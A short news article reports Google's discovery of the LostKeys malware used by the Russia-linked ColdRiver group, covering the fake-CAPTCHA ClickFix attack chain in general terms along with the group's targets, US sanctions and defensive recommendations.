Google has uncovered a new piece of malware named LostKeys, used by the hacker group ColdRiver, which has ties to the Russian FSB. This software is designed to steal information from Western organizations.

According to the Google Threat Intelligence Group (GTIG), LostKeys is utilized in specialized ClickFix attacks that rely on social engineering, starting with a fake CAPTCHA. Victims are tricked into executing malicious PowerShell scripts, which enable the downloading and execution of additional harmful software. The primary goal is to install LostKeys, operating as a digital vacuum that extracts files and system information. Hackers also deploy other malware, such as SPICA, to gather documents.

The ColdRiver group has been active since 2017 and is known by various names, including Star Blizzard and Callisto Group. Reports indicate that it has intensified its activities in recent years, particularly following the onset of Russia's invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense institutions, think tanks, politicians, journalists, and NGOs.

The United States has already imposed sanctions against certain members of the group and announced a reward of $10 million for information leading to their capture.

Google experts emphasize the need for enhanced cybersecurity, particularly for organizations that may become potential targets of ColdRiver attacks. They recommend utilizing advanced Google protection and regularly updating security systems to prevent similar threats.